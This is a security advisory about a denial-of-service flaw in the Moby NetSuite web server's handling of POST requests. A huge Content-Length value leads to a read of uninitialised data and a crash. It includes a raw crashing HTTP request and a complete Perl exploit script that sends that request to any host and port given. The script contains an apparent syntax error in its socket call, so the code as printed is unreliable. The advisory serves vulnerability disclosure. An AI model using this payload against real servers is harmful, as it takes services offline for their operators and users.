|
|
|
|
| |
| Moby NetSuite is an HTTP/SMTP package designed for simplicity. It supports CGI, including POST form submissions. A vulnerability in the POST handler could lead to denial of service against the server. |
| |
Credit:
The information has been provided by Matthew Murphy.
|
| |
When faced with a POST request, NetSuite allocates a buffer according to the incoming Content-Length header, reads in that number of bytes, and passes them on as the CGI process' STDIN stream. The value for the number of bytes read is returned from an atoi() call.
When the header's value is too large to fit in an integer value, or is not numeric, the atoi() library call leaves the variable in its previous state. In this case, the variable is undefined, as it has no data before the length is determined. An sprintf() call that occurs while creating the CGI environment for the child then attempts to read the undefined data, resulting in an access violation. Restart of services is required to regain normal functionality.
Example:
[Begin Session]
POST /cgi-bin/test.cgi HTTP/1.0
Content-Length: 111111111111111111111111111
A
[End Session]
NetSuite crashes within seconds with an access violation: illegal use of un-initialized data variable.
Exploit:
#!/usr/bin/perl
#
# Moby NetSuite HTTP POST Denial of Service
# Discovery/Exploit by Matthew Murphy
use IO::Socket;
use URI::Escape;
$buffer = "POST /cgi-bin/%s HTTP/1.0\r\nContent-Length: 111111111111111111111111111\r\n\r\nA\r\n\r\n";
if (@ARGV < 2 || @ARGV > 3) {
print STDOUT "Usage: perl $0 [filename] [host] [port=80]";
exit;
}
$filename = uri_escape($ARGV[0]);
$port = 80;
if (@ARGV == 3) {
$port = $ARGV[2];
}
$f = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$ARGV[1],PeerPort=$port);
if (defined($f)) {
$f->autoflush(1);
$attack = sprintf($buffer, $filename);
print $f $attack;
undef $f;
} else {
$mesg = sprintf("No listening socket on port %d of %s", $port, $ARGV[1]);
print STDOUT $mesg;
}
|
|
|
|
|
